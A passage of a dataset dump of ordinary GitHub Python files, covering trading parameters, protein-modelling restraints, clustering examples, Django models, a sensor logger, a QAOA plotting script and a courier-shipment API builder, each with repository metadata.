self.price_precision = 6\n self.dollar_multiplier = 1000\n \n elif self.m.ticker_code() == \"ZC\":\n self.tick_price = 0.25\n self.price_precision = 2\n self.dollar_multiplier = 50\n \n elif self.m.ticker_code() == \"ZS\":\n self.tick_price = 0.25\n self.price_precision = 2\n self.dollar_multiplier = 50\n\n self.max_breaking_price_changes_list = 50\n self.min_breaking_price_changes_list = 20\n\n\n # performance parameters with options\n # if parameter is set None, means that should be resolved in the specific part of the code, probably in Decision class.\n # if parameter is set 'calc', it is calculated in the property part\n # first value of tuple is default value\n def set_options_and_defaults(self):\n self.primary_look_back_time_options = (3600, 7200, 1800, 900) # secs # ideal for ES, 600-900 for all others\n self.density_division_options = (10, 5)\n \n # Stop time\n self.breaking_stop_time_options = (60, 20, 40, 80, 120) # secs\n self.speeding_stop_time_options = (10, 5, 20, 30) # secs\n\n # Breaking\n self._min_breaking_price_changes_options = (7, 3, 15, 'calc') # times\n self.breaking_up_down_ratio_options = (1.0, 1.5, 2.0)\n self.min_breaking_range_options = (4, 2, 6)\n\n # Speeding\n self.speeding_time_options = (5, 10, 20) # secs\n self.time_speeding_points_length_options = (4, 3, 6)\n self.speed_min_max_win_loose_ticks_options = ((2, 6), (3, 6), (4, 10))\n\n # Stop values\n self.reached_first_target_break_options = (1, 2)\n self.made_two_break_options = (1, 2)\n self.min_max_loose_ticks_options = ((1, 3), (2, 5)) # could replace speed_min_max_win_loose_ticks_options\n self.reversal_addition_break_options = (1, 2, 0)\n\n # Variety\n self._max_winning_ticks_options = (4, 1, 2) # With 1 it is mostly a market maker\n self.reduce_score_rate_on_price_data_length_options = ((150, 350, 0.75), (150, 300, 0.50), None, None)\n self.trade_initiation_ticks_options = (1, 0)\n\n # Scores\n self.breaking_price_changes_score_options = (3, 1, 0)\n self.duration_score_options = (1, 2, 0)\n self.in_line_score_options = (1, 2, 0)\n self.trend_two_score_options = (1, 2, 0)\n self.in_out_density_direction_score_options = (1, 2, 0)\n self.advantage_score_options = (3, 1, 0)\n\n # Set defaults (default value is the first of the options)\n current_vars = dict(vars(self))\n for variable, value in current_vars.items():\n if variable[-8:] == '_options':\n setattr(self, variable.replace('_options', ''), value[0])\n\n\n def randomize(self):\n for variable, value in vars(self).items():\n if variable[-8:] == '_options':\n setattr(self, variable.replace('_options', ''), random.choice(value))\n self.id = None # without any id, ParamsDb will assign a new one and save it as new\n\n\n @property\n def min_breaking_price_changes(self):\n if self._min_breaking_price_changes == 'calc':\n if len(self.m.breaking.price_changes_list) < self.min_breaking_price_changes_list:\n return self.default('_min_breaking_price_changes')\n else:\n try:\n return round(statistics.median(self.m.breaking.price_changes_list) * 1.5)\n except statistics.StatisticsError:\n return self.default('_min_breaking_price_changes')\n else:\n return self._min_breaking_price_changes\n\n\n @property\n def max_winning_ticks(self):\n if self._max_winning_ticks == 'calc':\n if len(self.m.results.data) < 20:\n return self.default('_max_winning_ticks')\n else:\n try:\n return statistics.mode(r.fantasy_pnl for r in self.m.results.data)\n except statistics.StatisticsError:\n return self.default('_max_winning_ticks')\n else:\n return self._max_winning_ticks\n\n\n def default(self, attr):\n return getattr(self, attr + '_options')[0]\n\n\n def attach_last_result(self, last=None):\n self.last_result = {}\n self.last_result['average_pnl'] = self.m.dollars(self.m.results.average_pnl(last))\n self.last_result['nr_of_winners'] = self.m.results.nr_of_wl('winners', last)\n self.last_result['nr_of_loosers'] = self.m.results.nr_of_wl('loosers', last)\n self.last_result['underlying'] = f\"{self.m.ticker_code()}_{time.strftime('%Y-%m-%d--%H-%M', time.localtime(self.m.last_time()))}\"\n\n\n def state_str(self):\n output = \" PARAMETERS:\\n\"\n output += f\" id: {self.id}\\n\"\n for variable, value in vars(self).items():\n if variable[-8:] == '_options':\n output += f\" {variable.replace('_options', '')}: {getattr(self, variable.replace('_options', ''))}\\n\"\n return output","repo_name":"bsampietro/algo_trading","sub_path":"models/params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":7475,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"2088955919","text":"\"\"\"@namespace IMP.pmi.restraints\n Classes to handle different kinds of restraints.\n\nPMI restraints generally wrap IMP restraints. Typical features in PMI restraints are:\n - Easy setup: for example, you can usually create one with a PMI [Molecule](@ref IMP::pmi::topology::Molecule) or a slice from one.\n - Fast setup from data files. For example you can set up the [CrossLinkingMassSpectrometryRestraint](@ref IMP::pmi::restraints::crosslinking::CrossLinkingMassSpectrometryRestraint) by reading in a cross-link file into a [database](@ref IMP::pmi::io::crosslink::CrossLinkDataBase).\n - Useful output: reporting functions which are put into log files when running [ReplicaExchange](@ref IMP::pmi::macros::ReplicaExchange).\n\"\"\" # noqa: E501\n\nimport IMP\nimport IMP.pmi\nimport IMP.pmi.tools\n\n\nclass RestraintBase(object):\n _include_in_rmf = False\n\n \"\"\"Base class for PMI restraints, which wrap `IMP.Restraint`(s).\"\"\"\n\n def __init__(self, m, name=None, label=None, weight=1.,\n restraint_set_class=IMP.RestraintSet):\n \"\"\"Constructor.\n @param m The model object\n @param name The name of the primary restraint set that is wrapped.\n This is used for outputs and particle/restraint names\n and should be set by the child class.\n @param label A unique label to be used in outputs and\n particle/restraint names.\n @param weight The weight to apply to all internal restraints.\n @param restraint_set_class The class to use for the restraint set\n \"\"\"\n self.model = m\n self.restraint_sets = []\n self._label_is_set = False\n self.weight = weight\n self._label = None\n self._label_suffix = \"\"\n self.set_label(label)\n\n if not name:\n self.name = self.__class__.__name__\n else:\n self.name = str(name)\n\n self.rs = self._create_restraint_set(name=None,\n cls=restraint_set_class)\n\n def set_label(self, label):\n \"\"\"Set the unique label used in outputs and particle/restraint names.\n @param label Label\n \"\"\"\n if self._label_is_set:\n raise ValueError(\"Label has already been set, or restraint has \"\n \"already been added to model.\")\n if not label:\n self._label = \"\"\n self._label_suffix = \"\"\n else:\n self._label = str(label)\n self._label_suffix = \"_\" + self._label\n self._label_is_set = True\n\n @property\n def label(self):\n return self._label\n\n def set_weight(self, weight):\n \"\"\"Set the weight to apply to all internal restraints.\n @param weight Weight\n \"\"\"\n self.weight = weight\n for rs in self.restraint_sets:\n rs.set_weight(self.weight)\n\n def add_to_model(self):\n \"\"\"Add the restraint to the model.\"\"\"\n self._label_is_set = True\n for rs in self.restraint_sets:\n IMP.pmi.tools.add_restraint_to_model(\n self.model, rs, add_to_rmf=self._include_in_rmf)\n\n def evaluate(self):\n \"\"\"Evaluate the score of the restraint.\"\"\"\n self._label_is_set = True\n return self.weight * self.rs.unprotected_evaluate(None)\n\n def get_restraint_set(self):\n \"\"\"Get the primary restraint set.\"\"\"\n self._label_is_set = True\n return self.rs\n\n def get_restraint(self):\n \"\"\"Get the primary restraint set. Identical to `get_restraint_set`.\"\"\"\n return self.get_restraint_set()\n\n def get_restraint_for_rmf(self):\n \"\"\"Get the restraint for visualization in an RMF file.\"\"\"\n self._label_is_set = True\n return self.rs\n\n def get_particles_to_sample(self):\n \"\"\"Get any created particles which should be sampled.\"\"\"\n self._label_is_set = True\n return {}\n\n def get_output(self):\n \"\"\"Get outputs to write to stat files.\"\"\"\n output = {}\n score = self.evaluate()\n output[\"_TotalScore\"] = str(score)\n\n suffix = \"_Score\" + self._label_suffix\n for rs in self.restraint_sets:\n out_name = rs.get_name() + suffix\n output[out_name] = str(\n self.weight * rs.unprotected_evaluate(None))\n return output\n\n def _create_restraint_set(self, name=None, cls=IMP.RestraintSet):\n \"\"\"Create ``IMP.RestraintSet``.\"\"\"\n if not name:\n name = self.name\n else:\n name = self.name + \"_\" + str(name)\n rs = cls(self.model, name)\n rs.set_weight(self.weight)\n self.restraint_sets.append(rs)\n rs.set_was_used(True)\n return rs\n\n\nclass _RestraintNuisanceMixin(object):\n\n \"\"\"Mix-in to add nuisance particle creation functionality to restraint.\n\n This class must only be inherited if also inheriting\n IMP.pmi.restraints.RestraintBase.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(_RestraintNuisanceMixin, self).__init__(*args, **kwargs)\n self.sampled_nuisances = {}\n self.nuisances = {}\n\n def _create_nuisance(self, init_val, min_val, max_val, max_trans, name,\n is_sampled=False):\n \"\"\"Create nuisance particle.\n @param init_val Initial value of nuisance\n @param min_val Minimum value of nuisance\n @param max_val Maximum value of nuisance\n @param max_trans Maximum move to apply to nuisance\n @param name Name of particle\n @param is_sampled Nuisance is a sampled particle\n @see IMP.pmi.tools.SetupNuisance\n \"\"\"\n nuis = IMP.pmi.tools.SetupNuisance(\n self.model, init_val, min_val, max_val,\n isoptimized=is_sampled).get_particle()\n nuis_name = self.name + \"_\" + name\n nuis.set_name(nuis_name)\n self.nuisances[nuis_name] = nuis\n if is_sampled:\n self.sampled_nuisances[nuis_name] = (nuis, max_trans)\n return nuis\n\n def get_particles_to_sample(self):\n \"\"\"Get any created particles which should be sampled.\"\"\"\n ps = super(_RestraintNuisanceMixin, self).get_particles_to_sample()\n for name, (nuis, max_trans) in self.sampled_nuisances.items():\n ps[\"Nuisances_\" + name + self._label_suffix] = ([nuis], max_trans)\n return ps\n\n def get_output(self):\n \"\"\"Get outputs to write to stat files.\"\"\"\n output = super(_RestraintNuisanceMixin, self).get_output()\n for nuis_name, nuis in self.nuisances.items():\n output[nuis_name + self._label_suffix] = str(nuis.get_scale())\n return output\n\n\nclass _NuisancesBase(object):\n\n \"\"\"This base class is used to provide nuisance setup and interface\n for the ISD cross-link restraints\"\"\"\n\n sigma_dictionary = {}\n psi_dictionary = {}\n\n def create_length(self):\n \"\"\"Create a nuisance on the length of the cross-link.\"\"\"\n lengthinit = 10.0\n self.lengthissampled = True\n lengthminnuis = 0.0000001\n lengthmaxnuis = 1000.0\n lengthmin = 6.0\n lengthmax = 30.0\n length = IMP.pmi.tools.SetupNuisance(self.m, lengthinit,\n lengthminnuis, lengthmaxnuis,\n self.lengthissampled\n ).get_particle()\n self.rslen.add_restraint(\n IMP.isd.UniformPrior(\n self.m,\n length,\n 1000000000.0,\n lengthmax,\n lengthmin))\n\n def create_sigma(self, resolution):\n \"\"\"Create a nuisance on the structural uncertainty.\"\"\"\n if isinstance(resolution, str):\n sigmainit = 2.0\n else:\n sigmainit = resolution + 2.0\n self.sigmaissampled = True\n sigmaminnuis = 0.0000001\n sigmamaxnuis = 1000.0\n sigmamin = 0.01\n sigmamax = 100.0\n sigmatrans = 0.5\n sigma = IMP.pmi.tools.SetupNuisance(self.m, sigmainit, sigmaminnuis,\n sigmamaxnuis, self.sigmaissampled\n ).get_particle()\n self.sigma_dictionary[resolution] = (\n sigma,\n sigmatrans,\n self.sigmaissampled)\n self.rssig.add_restraint(\n IMP.isd.UniformPrior(\n self.m,\n sigma,\n 1000000000.0,\n sigmamax,\n sigmamin))\n # self.rssig.add_restraint(IMP.isd.JeffreysRestraint(self.sigma))\n\n def get_sigma(self, resolution):\n \"\"\"Get the nuisance on structural uncertainty.\"\"\"\n if resolution not in self.sigma_dictionary:\n self.create_sigma(resolution)\n return self.sigma_dictionary[resolution]\n\n def create_psi(self, value):\n \"\"\"Create a nuisance on the inconsistency.\"\"\"\n if isinstance(value, str):\n psiinit = 0.5\n else:\n psiinit = value\n self.psiissampled = True\n psiminnuis = 0.0000001\n psimaxnuis = 0.4999999\n psimin = 0.01\n psimax = 0.49\n psitrans = 0.1\n psi = IMP.pmi.tools.SetupNuisance(self.m, psiinit,\n psiminnuis, psimaxnuis,\n self.psiissampled).get_particle()\n self.psi_dictionary[value] = (\n psi,\n psitrans,\n self.psiissampled)\n self.rspsi.add_restraint(\n IMP.isd.UniformPrior(\n self.m,\n psi,\n 1000000000.0,\n psimax,\n psimin))\n self.rspsi.add_restraint(IMP.isd.JeffreysRestraint(self.m, psi))\n\n def get_psi(self, value):\n \"\"\"Get the nuisance on the inconsistency.\"\"\"\n if value not in self.psi_dictionary:\n self.create_psi(value)\n return self.psi_dictionary[value]\n","repo_name":"salilab/pmi","sub_path":"pyext/src/restraints/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9974,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"6"} +{"seq_id":"20519442570","text":"\"\"\"!\r\n\r\n@brief Examples of usage and demonstration of abilities of SYNC-SOM algorithm in cluster analysis.\r\n\r\n@authors Andrei Novikov (pyclustering@yandex.ru)\r\n@date 2014-2020\r\n@copyright BSD-3-Clause\r\n\r\n\"\"\"\r\n\r\nfrom random import random\r\n\r\nfrom pyclustering.cluster import cluster_visualizer\r\nfrom pyclustering.cluster.syncsom import syncsom\r\n\r\nfrom pyclustering.samples.definitions import SIMPLE_SAMPLES\r\nfrom pyclustering.samples.definitions import FCPS_SAMPLES\r\n\r\nfrom pyclustering.utils import read_sample, draw_dynamics\r\nfrom pyclustering.utils import timedcall\r\n\r\n\r\ndef template_clustering(file, map_size, radius, sync_order = 0.999, show_dyn = False, show_layer1 = False, show_layer2 = False, show_clusters = True):\r\n # Read sample\r\n sample = read_sample(file)\r\n\r\n # Create network\r\n network = syncsom(sample, map_size[0], map_size[1], radius)\r\n \r\n # Run processing\r\n (ticks, (dyn_time, dyn_phase)) = timedcall(network.process, show_dyn, sync_order)\r\n print(\"Sample: \", file, \"\\t\\tExecution time: \", ticks, \"\\n\")\r\n \r\n # Show dynamic of the last layer.\r\n if show_dyn is True:\r\n draw_dynamics(dyn_time, dyn_phase, x_title = \"Time\", y_title = \"Phase\", y_lim=[0, 3.14])\r\n \r\n if show_clusters is True:\r\n clusters = network.get_som_clusters()\r\n \r\n visualizer = cluster_visualizer()\r\n visualizer.append_clusters(clusters, network.som_layer.weights)\r\n visualizer.show()\r\n \r\n # Show network stuff.\r\n if show_layer1 is True:\r\n network.show_som_layer()\r\n \r\n if show_layer2 is True:\r\n network.show_sync_layer()\r\n \r\n if show_clusters is True:\r\n clusters = network.get_clusters()\r\n \r\n visualizer = cluster_visualizer()\r\n visualizer.append_clusters(clusters, sample)\r\n visualizer.show()\r\n\r\ndef cluster_simple1():\r\n template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [4, 4], 1.0, 0.999, True, True, True, True)\r\n\r\ndef cluster_simple1_as_som():\r\n template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [1, 2], 1.0, 0.999, True, True, True, True)\r\n \r\ndef cluster_simple2():\r\n template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [4, 4], 1.0, 0.999, True, True, True, True)\r\n\r\ndef cluster_simple2_as_som():\r\n template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [1, 3], 1.0, 0.999, True, True, True, True)\r\n\r\ndef cluster_simple3():\r\n template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [5, 5], 1.0, 0.999, True, True, True, True)\r\n \r\ndef cluster_simple4():\r\n template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, [5, 5], 1.0, 0.999, True, True, True)\r\n \r\ndef cluster_simple5():\r\n template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, [5, 5], 1.0, 0.999, True, True, True)\r\n\r\ndef cluster_lsun():\r\n template_clustering(FCPS_SAMPLES.SAMPLE_LSUN, [9, 9], 0.45, 0.999, True, True, True)\r\n \r\ndef cluster_target():\r\n template_clustering(FCPS_SAMPLES.SAMPLE_TARGET, [9, 9], 0.9, 0.999, True, True, True)\r\n\r\ndef cluster_two_diamonds():\r\n template_clustering(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, [10, 10], 0.15, 0.999, True, True, True)\r\n\r\ndef cluster_wing_nut():\r\n template_clustering(FCPS_SAMPLES.SAMPLE_WING_NUT, [10, 10], 0.25, 0.999, True, True, True)\r\n\r\ndef cluster_chainlink():\r\n template_clustering(FCPS_SAMPLES.SAMPLE_CHAINLINK, [10, 10], 0.5, 0.999, True, True, True)\r\n\r\ndef cluster_hepta():\r\n template_clustering(FCPS_SAMPLES.SAMPLE_HEPTA, [7, 7], 1.0, 0.999, True, True, True)\r\n\r\ndef cluster_tetra():\r\n template_clustering(FCPS_SAMPLES.SAMPLE_TETRA, [7, 7], 0.4, 0.998, True, True, True)\r\n\r\ndef experiment_execution_time():\r\n template_clustering(FCPS_SAMPLES.SAMPLE_LSUN, [4, 4], 0.45, 0.999, False, False, False, False)\r\n template_clustering(FCPS_SAMPLES.SAMPLE_TARGET, [4, 4], 0.9, 0.998, False, False, False, False)\r\n template_clustering(FCPS_SAMPLES.SAMPLE_WING_NUT, [4, 4], 0.25, 0.999, False, False, False, False)\r\n template_clustering(FCPS_SAMPLES.SAMPLE_CHAINLINK, [4, 4], 0.5, 0.998, False, False, False, False)\r\n template_clustering(FCPS_SAMPLES.SAMPLE_TETRA, [4, 4], 0.4, 0.998, False, False, False, False)\r\n template_clustering(FCPS_SAMPLES.SAMPLE_HEPTA, [6, 6], 1.0, 0.998, False, False, False, False)\r\n template_clustering(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, [4, 4], 0.15, 0.998, False, False, False, False)\r\n template_clustering(FCPS_SAMPLES.SAMPLE_ATOM, [4, 4], 15, 0.998, False, False, False, False)\r\n\r\n\r\ndef experiment_execution_one_cluster_dependence(layer_first_size, radius, order):\r\n print(\"Experiment: map size =\", layer_first_size[0] * layer_first_size[1], \"radius =\", radius, \"order =\", order)\r\n cluster_sizes = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150]\r\n \r\n for cluster_size in cluster_sizes:\r\n # generate data sets\r\n dataset = []\r\n dataset += [ [random(), random()] for _ in range(cluster_size) ]\r\n \r\n general_value = 0.0\r\n amount_attempt = 5\r\n for _ in range(amount_attempt):\r\n network = syncsom(dataset, layer_first_size[0], layer_first_size[1], radius)\r\n (ticks, (dyn_time, dyn_phase)) = timedcall(network.process, False, order)\r\n general_value += ticks\r\n \r\n print(\"Sample: \", cluster_size, \"\\t\\tExecution time: \", general_value / float(amount_attempt))\r\n \r\n print(\"\\n\")\r\n\r\n\r\ncluster_simple1()\r\ncluster_simple1_as_som()\r\ncluster_simple2()\r\ncluster_simple2_as_som()\r\ncluster_simple3()\r\ncluster_simple4()\r\ncluster_simple5()\r\ncluster_lsun()\r\ncluster_target()\r\ncluster_two_diamonds()\r\ncluster_chainlink()\r\ncluster_hepta()\r\ncluster_tetra()\r\n\r\nexperiment_execution_time()\r\n\r\nexperiment_execution_one_cluster_dependence([5, 5], 0.6, 0.998)\r\nexperiment_execution_one_cluster_dependence([6, 6], 0.6, 0.998)\r\nexperiment_execution_one_cluster_dependence([7, 7], 0.6, 0.998)\r\nexperiment_execution_one_cluster_dependence([8, 8], 0.6, 0.998)\r\nexperiment_execution_one_cluster_dependence([9, 9], 0.6, 0.998)\r\nexperiment_execution_one_cluster_dependence([10, 10], 0.6, 0.998)\r\n","repo_name":"annoviko/pyclustering","sub_path":"pyclustering/cluster/examples/syncsom_examples.py","file_name":"syncsom_examples.py","file_ext":"py","file_size_in_byte":6040,"program_lang":"python","lang":"en","doc_type":"code","stars":1113,"dataset":"github-code","pt":"6"} +{"seq_id":"72174130749","text":"from django.db import models\nfrom accounts.models import User\n\nclass Cuisine(models.Model):\n \"\"\"\n Model for cuisine.\n\n Attributes:\n name (str): The name of the cuisine.\n \"\"\"\n\n name = models.CharField(max_length=100)\n\n def __str__(self):\n \"\"\"\n Returns a string representation of the cuisine.\n\n Returns:\n str: The name of the cuisine.\n \"\"\"\n return self.name\n\nclass Restaurant(models.Model):\n \"\"\"\n Model for a restaurant.\n\n Attributes:\n restaurant_manager (User): The manager of the restaurant.\n restaurant_name (str): The name of the restaurant.\n restaurant_phone (str): The phone number of the restaurant.\n restaurant_status (int): The status of the restaurant (choices defined in RESTAURANT_STATUS).\n cuisines (list): The cuisines offered by the restaurant.\n opening_time (Time): The opening time of the restaurant.\n closing_time (Time): The closing time of the restaurant.\n restaurant_address (str): The address of the restaurant.\n restaurant_state (str): The state where the restaurant is located.\n restaurant_city (str): The city where the restaurant is located.\n restaurant_pin_code (str): The pin code of the restaurant's location.\n latitude (float): The latitude of the restaurant's location.\n longitude (float): The longitude of the restaurant's location.\n \"\"\"\n\n OPENED = 1\n CLOSED = 2\n\n RESTAURANT_STATUS = (\n (OPENED, 'Opened'),\n (CLOSED, 'Closed'),\n )\n\n class Meta:\n verbose_name = 'restaurant'\n verbose_name_plural = 'restaurants'\n\n restaurant_manager = models.OneToOneField(User, on_delete=models.CASCADE)\n restaurant_name = models.CharField(max_length=30, blank=False)\n restaurant_phone = models.CharField(max_length=10, null=False, blank=False)\n restaurant_status = models.PositiveSmallIntegerField(choices=RESTAURANT_STATUS, default=1)\n cuisines = models.ManyToManyField(Cuisine, blank=True)\n opening_time = models.TimeField()\n closing_time = models.TimeField()\n\n restaurant_address = models.CharField(max_length=250, blank=True, null=True)\n restaurant_state = models.CharField(max_length=15, blank=True, null=True)\n restaurant_city = models.CharField(max_length=15, blank=True, null=True)\n restaurant_pin_code = models.CharField(max_length=6, blank=True, null=True)\n\n latitude = models.DecimalField(max_digits=9, decimal_places=6)\n longitude = models.DecimalField(max_digits=9, decimal_places=6)\n\n def __str__(self):\n \"\"\"\n Returns a string representation of the restaurant.\n\n Returns:\n str: The name of the restaurant.\n \"\"\"\n return self.restaurant_name\n\nclass Menu(models.Model):\n \"\"\"\n Model for a menu item.\n\n Attributes:\n restaurant (Restaurant): The restaurant to which this menu item belongs.\n item (str): The name of the menu item.\n price (int): The price of the menu item.\n \"\"\"\n\n restaurant = models.ForeignKey(Restaurant, on_delete=models.CASCADE)\n item = models.CharField(max_length=30)\n price = models.PositiveSmallIntegerField()\n\n def __str__(self):\n \"\"\"\n Returns a string representation of the menu item.\n\n Returns:\n str: The name of the menu item.\n \"\"\"\n return self.item\n","repo_name":"akshay-toshniwal/food-delivery-backend","sub_path":"restaurant/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18525418245","text":"import time\n\nLOG = {'tmstamp':[]}\n\nwith open('log.csv','w') as f:\n f.write('tmstamp,mpu_6050,stc_3100,photo,antenna\\n')\n\ndef log(dct):\n global LOG\n LOG['tmstamp'].append(time.time())\n for k, v in dct.items():\n if k not in LOG:\n LOG[k] = [v]\n else:\n LOG[k].append(v)\n if len(LOG.keys()) > 1:\n with open('log.csv','a') as f:\n string = ''\n for k,v in LOG.items():\n string += '\"' + str(v[-1]) + '\"' + ','\n string.lstrip(',')\n string += '\\n'\n f.write(string)","repo_name":"marius-ne/AQUIS","sub_path":"python/architecture/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"4556541405","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 3 09:11:08 2020\n\n@author: joost\n\"\"\"\n\nimport numpy as np\nfrom data_load import load_csv\nimport matplotlib.pyplot as plt\nfrom GW import goemans_williamson\n\n# exponent or exponent of square root\nSQR = True\nplt.figure()\np_max = 8\ngraph_weight = 'weighted'\ncolors = [\"tab:blue\",\"tab:orange\",\"tab:green\",\"tab:red\",\"tab:purple\",\"tab:pink\",\"tab:cyan\"]\n\n\nfor c,n in enumerate([8,10,12,14,16]):\n # loading dataframe\n pre = \"data_trim/data_trim_3-regular_\"\n post =\".csv\"\n filename = graph_weight+\"_INT_\"+str(n)\n df = load_csv(pre+filename+post);\n \n r_sum = np.zeros(p_max)\n r_GW = 0\n label = True\n \n # looping over the different graphs\n for k,i in enumerate(range(0,len(df),p_max)): \n print(k,i)\n Fp = np.array([df['Fp'][i+j] for j in range(p_max)])\n Cmax = np.array([df['Cmax'][i+j] for j in range(p_max)])\n \n G = df['graph'][i]\n \n r = Fp/Cmax\n r_GW += np.mean([goemans_williamson(G) for i in range(10)])/Cmax[0]\n r_sum += r\n \n xticks = np.arange(1,p_max+1)\n r_mean = r_sum/len(range(0,len(df),p_max))\n r_GW = r_GW/len(range(0,len(df),p_max))\n \n # Mean, including a fit\n from scipy import optimize\n def test_func(p, a, b):\n if not SQR:\n return a * np.exp(-p / b)\n if SQR:\n return a * np.exp(-np.sqrt(p / b))\n \n if not SQR:\n label = r'$\\alpha e^{-p/p_0}$'\n if SQR:\n label = r'$\\alpha e^{-\\sqrt{p/p_0}}$'\n \n \n params, params_covariance = optimize.curve_fit(test_func, xticks, 1-r_mean,\n p0=[0.8, 2])\n plt.yscale(\"log\")\n plt.plot(xticks,1-r_mean, linestyle = 'None', color = colors[c], marker = 'o', label = 'n = '+str(n))\n plt.hlines(1-r_GW, 1,p_max, linestyle = 'dashed', color = colors[c])#, label = r'$1-r_{GW}$ n = '+str(n))\n plt.plot(xticks,test_func(xticks,params[0],params[1]), color = colors[c], linestyle = 'solid')\n plt.grid(True,which=\"both\", ls=\"-\")\n \nplt.hlines(1-0.878, 1,p_max,colors='coral', linestyles = 'dotted', label = 'GW bound')\nplt.ylabel(r'$1-r$')\nplt.xlabel('p')\nplt.legend()\nplt.show()","repo_name":"soosub/bsc-thesis","sub_path":"Implementation/NewPlan/plots/data_analysis_3-regular_r-trends_system-size.py","file_name":"data_analysis_3-regular_r-trends_system-size.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"44870073076","text":"#!/usr/bin/python3\n\n# Process all the 4 text files i.e. james.txt, juile.txt, mikey.txt, sarah.txt\n\ndef main():\n \n sarah = []\n \n try:\n sarah = get_coach_data('sarah.txt')\n \n print(sarah['Name'] + \"'s fastest times are: \" + sarah['Times'])\n except IOError:\n print(\"Error\")\n\n# Sanitize the given string and replace ':' and '-' with '.'\ndef sanitize(time_string):\n if '-' in time_string:\n splitter = '-'\n elif ':' in time_string:\n splitter= ':'\n else:\n return time_string\n \n (mins, secs) = time_string.split(splitter)\n \n return (mins + '.' + secs)\n\n# Read the file data and split it and return the array\ndef get_coach_data(file_name):\n try:\n with open(file_name) as file:\n data = file.readline()\n temp = (data.strip().split(','))\n return {'Name': temp.pop(0),\n 'DOB': temp.pop(0),\n 'Times': str(sorted(set([sanitize(t) for t in temp]))[0:3])\n }\n except IOError as error:\n print('File Error: ' + str(error))\n return(None)\n\nif __name__ == '__main__' : main()\n","repo_name":"sandeepgholve/Python_Programming","sub_path":"HeadFirstExamples/06_custom_data_objects/process_data8_use_dictionary.py","file_name":"process_data8_use_dictionary.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"25069125695","text":"from typing import List, Tuple\nfrom ics_courier_lib.services import (\n AddressInfo,\n ArrayOfPieceInfo,\n Authenticate,\n CreateShipment,\n PackageInfo,\n PieceInfo,\n ArrayOfString,\n CreateShipmentResponse,\n)\nfrom purplship.core.models import (\n Documents,\n Message,\n ShipmentRequest,\n ShipmentDetails,\n)\nfrom purplship.core.utils import (\n create_envelope,\n Serializable,\n Element,\n Envelope,\n XP,\n)\nfrom purplship.core.units import Packages, Options\nfrom purplship.providers.ics_courier.error import parse_error_response\nfrom purplship.providers.ics_courier.utils import Settings\nfrom purplship.providers.ics_courier.units import Service, Option\n\n\ndef parse_shipment_response(\n response: Element, settings: Settings\n) -> Tuple[ShipmentDetails, List[Message]]:\n package = XP.find(\"PackageID\", response, ArrayOfString, first=True)\n label = XP.find(\"label\", response, first=True)\n details = (\n _extract_details((package.string[0], str(label.text)), settings)\n if getattr(package, \"string\", [None])[0] is not None\n else None\n )\n\n return details, parse_error_response(response, settings)\n\n\ndef _extract_details(response: Tuple[str, str], settings: Settings) -> ShipmentDetails:\n package_id, label = response\n\n return ShipmentDetails(\n carrier_id=settings.carrier_id,\n carrier_name=settings.carrier_name,\n tracking_number=package_id,\n shipment_identifier=package_id,\n docs=Documents(label=label),\n )\n\n\ndef shipment_request(\n payload: ShipmentRequest, settings: Settings\n) -> Serializable[Envelope]:\n packages = Packages(payload.parcels)\n options = Options(payload.options, Option)\n product = Service.map(payload.service).value_or_key\n\n request = create_envelope(\n body_content=CreateShipment(\n AuthenicateAccount=Authenticate(\n AccountID=settings.account_id,\n Password=settings.password,\n ),\n ConsigneeInfo=AddressInfo(\n ID=payload.recipient.id,\n Name=payload.recipient.company_name,\n Address1=payload.recipient.address_line1,\n Address2=payload.recipient.address_line2,\n City=payload.recipient.city,\n Province=payload.recipient.state_code,\n Postcode=payload.recipient.postal_code,\n Contact=payload.recipient.person_name,\n Phone=payload.recipient.phone_number,\n ),\n PackageInfo=PackageInfo(\n Product=product,\n Pieces=ArrayOfPieceInfo(\n PieceInfo=[\n PieceInfo(\n Weight=piece.weight.value,\n WeightUnit=piece.weight.unit,\n Length=piece.length.value,\n Width=piece.width.value,\n Height=piece.height.value,\n DeclaredValue=None,\n )\n for piece in packages\n ]\n ),\n Contact=payload.shipper.person_name,\n Phone=payload.shipper.phone_number,\n CostCenter=options.ics_courier_cost_center,\n Refereces=(\n ArrayOfString(string=[payload.reference])\n if payload.reference is not None\n else payload.reference\n ),\n NotificationEmail=(\n options.email_notification_to or payload.recipient.email_address\n if options.email_notification\n and any(\n [\n options.email_notification_to\n or payload.recipient.email_address\n ]\n )\n else None\n ),\n SpecialInstruction=options.ics_courier_special_instruction,\n NoSignatureRequired=options.ics_courier_no_signature_required,\n ShipDate=options.ship_date,\n ),\n ),\n )\n\n return Serializable(request)\n","repo_name":"danh91/purplship","sub_path":"sdk/extensions/ics_courier/purplship/providers/ics_courier/shipment/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} 